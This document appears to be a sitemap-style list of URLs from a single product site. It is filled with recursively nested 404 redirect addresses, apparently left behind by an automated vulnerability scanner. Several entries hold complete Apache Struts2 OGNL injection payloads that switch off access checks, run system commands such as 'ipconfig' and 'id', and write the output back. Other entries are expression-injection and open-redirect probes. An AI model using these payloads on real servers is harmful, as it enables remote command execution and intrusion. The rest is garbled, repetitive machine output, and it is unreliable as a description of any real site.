http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3fredirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 